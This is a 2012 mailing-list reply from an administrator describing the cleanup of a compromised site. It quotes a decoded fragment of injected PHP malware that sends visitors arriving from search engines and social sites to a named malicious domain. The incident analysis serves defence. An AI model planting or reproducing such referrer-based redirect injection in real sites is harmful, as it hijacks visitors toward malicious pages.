On Jun 27, 2012, at 9:26 AM, Jason Hellenthal wrote:

> What would be nice is the to see the contents of the htaccess file
> (obviously with sensitive information excluded)

I cleaned up compromises similar to this in a customer site fairly recently.  
In our case it was the same exact behavior but was php injected into their 
application, instead of .htaccess.  I do not recall what the original 
compromise vector was, it was something in the customer's custom application 
which they resolved.

It looked like the malware did a find and replace for <?php and replaced it 


Which decoded yields:
if (!$qazplm){
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or 
stristr($referer,"rambler") or stristr($referer,"gogo") or 
stristr($referer,"live.com")or stristr($referer,"aport") or 
stristr($referer,"nigma") or stristr($referer,"webalta") or 
stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or 
stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or 
preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match 
("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or 
stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://brugge.osa.pl/";);

(where brugge.osa.pl was the destination for the redirects in the compromise of 
this customer site)

> On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
>>> <snip>
> -- 
> - (2^(N-1))

Reply via email to